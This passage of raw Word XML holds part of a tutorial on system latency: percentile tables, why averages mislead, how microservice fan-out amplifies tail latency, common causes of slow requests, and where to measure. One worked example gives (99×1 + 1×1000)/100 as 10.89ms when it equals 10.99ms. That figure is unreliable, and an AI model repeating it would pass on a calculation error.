    <w:p w14:paraId="10628E88" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Network (US): 60,000 μs   (600,000x slower than memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3002A88F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The latency hierarchy spans 6 orders of magnitude. This is why caching works: moving data one level closer (from disk to memory, from remote to local) can improve latency by 1000x.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710955C8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Latency Distribution — Why Averages Lie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2CBFB6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem with average latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C36BE0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150E6A83" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>99 requests complete in 1ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6518D9E9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>1 request completes in 1000ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056CB3F0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="363FAE11" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Average: (99×1 + 1×1000) / 100 = 10.89ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44059EA3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Median (p50): 1ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3B29A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>p99: 1000ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71077A2F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="46E75EC6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The average says "10.89ms" but 99% of users experience 1ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352BBBF4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>One user experiences 1000ms (the average tells you nothing about them).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D65A4D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Percentile latencies (the right way to measure):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724"/>
        <w:gridCol w:w="3688"/>
        <w:gridCol w:w="3938"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="041D1A2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5333EE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Percentile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FC2A40" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning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ED853D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Typical Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="6619B2A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81FFD8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>p50 (median)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40F6F4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Half of requests are faster than this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4EE7A6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>The "normal" experience</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="24ED8A5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E6B6D7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>p90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00FC3E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>90% are faster, 10% are slower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D9C1D4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>First sign of tail latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="4093B29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E087B7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>p95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C35119" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>5% of requests are slower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0AE8D9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Common SLA metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="2A5458C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36F197" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:lastRenderedPageBreak/>
              <w:t>p99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DF2A89" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>1% are slower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6FAD32" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Worst case for most users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="0D9F1C5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DF2084" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>p99.9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EF2759" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>0.1% are slower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C52813" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Critical for high-traffic services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="56F091C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0FC123" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>p99.99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713763" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>0.01% are slower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66C717" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Matters at scale (millions of requests)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66163425" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why tail latency matters at scale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDB6500" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>A page load makes 50 backend calls (microservices fan-out):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BEB0FB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399849F3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Each service has p99 latency of 100ms (1% chance of being slow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2259D508" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Probability ALL 50 are fast: (0.99)^50 = 60.5%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E6101" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Probability at LEAST ONE is slow: 39.5%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC600B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="5F2D696D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>→ 40% of page loads are slowed by at least one tail-latency call!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3255DC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>At 100 backend calls: (0.99)^100 = 36.6% chance all fast. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>64% of page loads hit a tail latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6214BBE7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>This is why tail latency in distributed systems is the critical optimization target, not average or median.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507964CF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.4 Sources of Tail Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D3582" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why some requests are 100x slower than the median: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020"/>
        <w:gridCol w:w="4325"/>
        <w:gridCol w:w="2005"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="44AFC30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9AB409" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>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F9A81E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mechanism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B3617C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Latency Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="17EBED0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DA2D2D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>GC pause (Java/Go)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03E952" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Stop-the-world garbage collection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1ABDB0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>10–500ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="0099C5B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F18C3F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Context switching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9E3124" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Thread/process being scheduled out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D00D45" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>1–10ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="7C5B822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42D96B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Lock contention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9BB2D7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Thread waiting for a mutex</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28C6B3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="11D7702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9C72FF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:lastRenderedPageBreak/>
              <w:t>Page fault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F48B42" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Memory not in RAM, fetched from disk/swap</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8F4F06" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>1–10ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="3FC040E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F71D68" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Disk I/O (not in cache)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2FD4F4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Buffer pool miss, actual disk seek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097AFF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>5–15ms (HDD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="76CAE4F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86EDEE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Network retransmission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62A1A5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>TCP packet lost, retransmit after timeout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E01D24" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>RTT + backoff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="2A8A37D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BFA1F0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>TLS handshake (cold)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B460E9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>No session resumption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F693A0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>2 RTT (30–300ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="64E47DD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8C2CD6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>DNS resolution (cold)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A0D467" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Not in cache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0131E8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>50–200ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="3A5B8E4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BCF59B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Connection pool exhaustion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26F3E1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Waiting for a free connection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66DDE6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>0–timeout ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="6593B46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6D3B50" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Noisy neighbor (cloud)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8954E4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Co-tenant consuming shared resources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8A66B9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="6C8BFAE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7BB9BD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Background tasks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9172F6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Compaction, checkpointing, log rotation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F3FF0A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Burst latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="17E6DBA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252258" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Cold cache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A36D40" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>First access after eviction/restart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A2FD93" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Full miss latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E846032" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.5 Measuring Latency Correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B1431" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where to measure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F24DDB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A18AEC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Client-perceived latency (end-to-end):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5B5AB2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Start: client sends request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB34C23" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  End: client receives complete response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C9CA8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Includes: ALL network, ALL processing, ALL queuing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16928684" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="0E3F333F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Server-side latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299DC1B1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Start: server receives first byte of request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C79EB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  End: server sends last byte of response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737E054F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Missing: client-to-server network, server-to-client network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E98D7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="135A54BD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Per-component latency (distributed tracing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7187F7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Each service hop measured independently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D79D624" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
